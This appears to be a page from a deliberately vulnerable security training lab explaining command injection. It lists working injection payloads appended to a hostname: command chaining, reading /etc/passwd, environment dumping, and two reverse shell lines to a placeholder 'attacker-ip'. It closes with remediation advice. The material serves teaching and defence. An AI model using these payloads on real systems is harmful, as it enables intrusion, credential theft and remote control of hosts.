🚨 Command Injection Vulnerability

What makes this vulnerable:

User input directly concatenated into shell commands
No input validation or sanitization
Special shell characters not escaped
Command chaining and piping allowed

Test Command Injection:

Command Injection Payloads:

Command Chaining:

google.com; whoami
google.com && cat /etc/passwd
google.com || id
google.com | cat /etc/hosts

Subcommand Execution:

google.com `whoami`
google.com $(cat /etc/passwd)
google.com & sleep 10 &

Information Gathering:

google.com; uname -a
google.com; ps aux
google.com; env
google.com; ls -la /

Reverse Shell (be careful!):

google.com; bash -i >& /dev/tcp/attacker-ip/4444 0>&1
google.com; nc -e /bin/bash attacker-ip 4444

How to fix:

Never use user input directly in shell commands
Use parameterized commands or safe APIs
Validate input against strict whitelists
Escape shell metacharacters properly
Use language-specific libraries instead of shell commands
Run with minimal privileges